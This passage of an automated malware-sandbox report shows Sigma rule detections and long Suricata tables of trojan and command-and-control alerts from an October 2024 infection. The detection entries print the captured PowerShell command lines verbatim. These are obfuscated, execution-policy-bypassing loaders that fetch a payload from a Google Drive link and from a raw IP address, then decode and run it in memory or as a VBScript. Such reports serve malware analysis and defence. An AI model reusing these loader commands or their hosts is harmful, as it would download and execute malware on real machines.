tzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", CommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgI
              Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/22
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3740, TargetFilename: C:\Users\user\AppData\Local\Temp\q4yillfe.2xt.ps1

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3740, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline", ProcessId: 3940, ProcessName: csc.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:30.268769+010020241971A Network Trojan was detected198.46.178.15580192.168.2.2249164TCP
              2024-10-29T10:12:33.244629+010020241971A Network Trojan was detected198.46.178.15580192.168.2.2249166TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:30.268715+010020244491Attempted User Privilege Gain192.168.2.2249164198.46.178.15580TCP
              2024-10-29T10:12:33.244607+010020244491Attempted User Privilege Gain192.168.2.2249166198.46.178.15580TCP
              2024-10-29T10:12:51.989536+010020244491Attempted User Privilege Gain192.168.2.2249174198.46.178.15580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:13:30.820927+010020243121A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
              2024-10-29T10:13:31.936132+010020243121A Network Trojan was detected192.168.2.224918094.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:28.076357+010020253811Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
              2024-10-29T10:13:29.856264+010020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
              2024-10-29T10:13:30.955412+010020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
              2024-10-29T10:13:31.998506+010020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
              2024-10-29T10:13:33.108548+010020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
              2024-10-29T10:13:34.231392+010020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
              2024-10-29T10:13:35.341029+010020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
              2024-10-29T10:13:36.463967+010020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
              2024-10-29T10:13:37.579761+010020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
              2024-10-29T10:13:39.050088+010020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
              2024-10-29T10:13:40.170722+010020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
              2024-10-29T10:13:41.781266+010020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
              2024-10-29T10:13:42.896730+010020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
              2024-10-29T10:13:44.993804+010020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
              2024-10-29T10:13:46.280841+010020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
              2024-10-29T10:13:47.420972+010020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
              2024-10-29T10:13:48.603620+010020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
              2024-10-29T10:13:49.772798+010020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
              2024-10-29T10:13:50.927162+010020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
              2024-10-29T10:13:52.047823+010020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
              2024-10-29T10:13:53.157010+010020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
              2024-10-29T10:13:54.270732+010020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
              2024-10-29T10:13:55.369834+010020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
              2024-10-29T10:13:56.838879+010020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
              2024-10-29T10:13:57.950747+010020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
              2024-10-29T10:13:59.074338+010020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
              2024-10-29T10:14:00.190441+010020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
              2024-10-29T10:14:01.529409+010020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
              2024-10-29T10:14:02.711233+010020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
              2024-10-29T10:14:04.625906+010020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
              2024-10-29T10:14:05.771818+010020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
              2024-10-29T10:14:06.869151+010020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
              2024-10-29T10:14:08.021965+010020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
              2024-10-29T10:14:09.220051+010020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
              2024-10-29T10:14:10.347813+010020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
              2024-10-29T10:14:11.459902+010020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
              2024-10-29T10:14:12.547431+010020253811Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
              2024-10-29T10:14:13.671022+010020253811Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
              2024-10-29T10:14:14.801048+010020253811Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
              2024-10-29T10:14:15.922364+010020253811Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
              2024-10-29T10:14:17.265733+010020253811Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
              2024-10-29T10:14:18.392312+010020253811Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:13:32.971704+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249181TCP
              2024-10-29T10:13:34.094708+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249182TCP
              2024-10-29T10:13:35.205169+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249183TCP
              2024-10-29T10:13:36.322785+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249184TCP
              2024-10-29T10:13:37.428185+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249185TCP
              2024-10-29T10:13:38.579991+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249186TCP
              2024-10-29T10:13:40.022399+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249187TCP
              2024-10-29T10:13:41.206442+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249188TCP
              2024-10-29T10:13:42.749810+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249189TCP
              2024-10-29T10:13:43.867609+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249190TCP
              2024-10-29T10:13:45.953294+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249191TCP
              2024-10-29T10:13:47.254189+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249192TCP
              2024-10-29T10:13:48.459319+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249193TCP
              2024-10-29T10:13:49.632627+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249194TCP
              2024-10-29T10:13:50.729465+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249195TCP
              2024-10-29T10:13:51.910556+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249196TCP
              2024-10-29T10:13:53.021306+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249197TCP
              2024-10-29T10:13:54.109672+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249198TCP
              2024-10-29T10:13:55.216504+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249199TCP
              2024-10-29T10:13:56.386317+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249200TCP
              2024-10-29T10:13:57.807376+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249201TCP
              2024-10-29T10:13:58.919674+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249202TCP
              2024-10-29T10:14:00.051018+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249203TCP
              2024-10-29T10:14:01.157166+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249204TCP
              2024-10-29T10:14:02.488973+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249205TCP
              2024-10-29T10:14:03.675547+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249206TCP
              2024-10-29T10:14:05.598044+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249207TCP
              2024-10-29T10:14:06.728472+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249208TCP
              2024-10-29T10:14:07.843381+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249209TCP
              2024-10-29T10:14:09.007417+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249210TCP
              2024-10-29T10:14:10.204340+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249211TCP
              2024-10-29T10:14:11.313087+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249212TCP
              2024-10-29T10:14:12.413950+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249213TCP
              2024-10-29T10:14:13.532342+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249214TCP
              2024-10-29T10:14:14.653733+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249215TCP
              2024-10-29T10:14:15.782689+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249216TCP
              2024-10-29T10:14:16.902025+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249217TCP
              2024-10-29T10:14:18.236334+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249218TCP
              2024-10-29T10:14:19.364547+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249219TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:28.076357+010020243131Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
              2024-10-29T10:13:32.965512+010020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
              2024-10-29T10:13:34.088596+010020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
              2024-10-29T10:13:35.198941+010020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
              2024-10-29T10:13:36.316886+010020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
              2024-10-29T10:13:37.422293+010020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
              2024-10-29T10:13:38.573554+010020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
              2024-10-29T10:13:40.015986+010020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
              2024-10-29T10:13:41.200196+010020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
              2024-10-29T10:13:42.743368+010020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
              2024-10-29T10:13:43.861544+010020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
              2024-10-29T10:13:45.944329+010020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
              2024-10-29T10:13:47.248135+010020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
              2024-10-29T10:13:48.453390+010020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
              2024-10-29T10:13:49.623104+010020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
              2024-10-29T10:13:50.723463+010020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
              2024-10-29T10:13:51.904772+010020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
              2024-10-29T10:13:53.014722+010020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
              2024-10-29T10:13:54.103754+010020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
              2024-10-29T10:13:55.210408+010020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
              2024-10-29T10:13:56.379678+010020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
              2024-10-29T10:13:57.801392+010020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
              2024-10-29T10:13:58.912752+010020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
              2024-10-29T10:14:00.044951+010020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
              2024-10-29T10:14:01.151093+010020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
              2024-10-29T10:14:02.482655+010020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
              2024-10-29T10:14:03.669757+010020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
              2024-10-29T10:14:05.592235+010020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
              2024-10-29T10:14:06.722224+010020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
              2024-10-29T10:14:07.836740+010020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
              2024-10-29T10:14:09.001649+010020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
              2024-10-29T10:14:10.198279+010020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
              2024-10-29T10:14:11.307250+010020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
              2024-10-29T10:14:12.407984+010020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
              2024-10-29T10:14:13.526537+010020243131Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
              2024-10-29T10:14:14.647850+010020243131Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
              2024-10-29T10:14:15.776767+010020243131Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
              2024-10-29T10:14:16.895264+010020243131Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
              2024-10-29T10:14:18.229887+010020243131Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
              2024-10-29T10:14:19.358295+010020243131Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:28.076357+010020243181Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
              2024-10-29T10:13:32.965512+010020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
              2024-10-29T10:13:34.088596+010020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
              2024-10-29T10:13:35.198941+010020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
              2024-10-29T10:13:36.316886+010020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
              2024-10-29T10:13:37.422293+010020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
              2024-10-29T10:13:38.573554+010020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
              2024-10-29T10:13:40.015986+010020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
              2024-10-29T10:13:41.200196+010020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
              2024-10-29T10:13:42.743368+010020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
              2024-10-29T10:13:43.861544+010020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
              2024-10-29T10:13:45.944329+010020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
              2024-10-29T10:13:47.248135+010020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
              2024-10-29T10:13:48.453390+010020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
              2024-10-29T10:13:49.623104+010020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
              2024-10-29T10:13:50.723463+010020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
              2024-10-29T10:13:51.904772+010020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
              2024-10-29T10:13:53.014722+010020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
              2024-10-29T10:13:54.103754+010020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
              2024-10-29T10:13:55.210408+010020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
              2024-10-29T10:13:56.379678+010020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
              2024-10-29T10:13:57.801392+010020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
              2024-10-29T10:13:58.912752+010020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
              2024-10-29T10:14:00.044951+010020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
              2024-10-29T10:14:01.151093+010020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
              2024-10-29T10:14:02.482655+010020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
              2024-10-29T10:14:03.669757+010020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
              2024-10-29T10:14:05.592235+010020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
              2024-10-29T10:14:06.722224+010020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
              2024-10-29T10:14:07.836740+010020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
              2024-10-29T10:14:09.001649+010020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
              2024-10-29T10:14:10.198279+010020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
              2024-10-29T10:14:11.307250+010020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
              2024-10-29T10:14:12.407984+010020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
              2024-10-29T10:14:13.526537+010020243181Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
              2024-10-29T10:14:14.647850+010020243181Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
              2024-10-29T10:14:15.776767+010020243181Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
              2024-10-29T10:14:16.895264+010020243181Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
              2024-10-29T10:14:18.229887+010020243181Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
              2024-10-29T10:14:19.358295+010020243181Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:28.076357+010020216411A Network Trojan was detected192.168.2.224922094.156.177.22080TCP
              2024-10-29T10:13:29.856264+010020216411A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
              2024-10-29T10:13:30.955412+010020216411A Network Trojan was detected192.168.2.224918094.156.177.22080TCP
              2024-10-29T10:13:31.998506+010020216411A Network Trojan was detected192.168.2.224918194.156.177.22080TCP
              2024-10-29T10:13:33.108548+010020216411A Network Trojan was detected192.168.2.224918294.156.177.22080TCP
              2024-10-29T10:13:34.231392+010020216411A Network Trojan was detected192.168.2.224918394.156.177.22080TCP
              2024-10-29T10:13:35.341029+010020216411A Network Trojan was detected192.168.2.224918494.156.177.22080TCP
